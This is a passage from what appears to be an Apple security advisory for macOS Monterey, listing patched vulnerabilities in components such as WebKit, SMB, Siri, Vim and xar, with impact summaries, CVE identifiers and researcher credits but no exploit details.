CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**QuickTime Player**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-22650: Wojciech Reguła (@\_r3ggi) of SecuRing

**Safari Downloads**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**Sandbox**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran

**Siri**

Available for: macOS Monterey

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)

**SMB**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22651: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey Jin (@patch1t)

**System Preferences**

Available for: macOS Monterey

Impact: An app may be able to spoof system notifications and UI

Description: This issue was addressed with a new entitlement.

CVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**UIKit**

Available for: macOS Monterey

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**Vim**

Available for: macOS Monterey

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2021-4136

CVE-2021-4166

CVE-2021-4173

CVE-2021-4187

CVE-2021-4192

CVE-2021-4193

CVE-2021-46059

CVE-2022-0128

CVE-2022-0156

CVE-2022-0158

**VoiceOver**

Available for: macOS Monterey

Impact: A user may be able to view restricted content from the lock screen

Description: A lock screen issue was addressed with improved state management.

CVE-2021-30918: an anonymous researcher

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Monterey

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

**xar**

Available for: macOS Monterey

Impact: A local user may be able to write arbitrary files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2022-22582: Richard Warren of NCC Group

Tag

#apple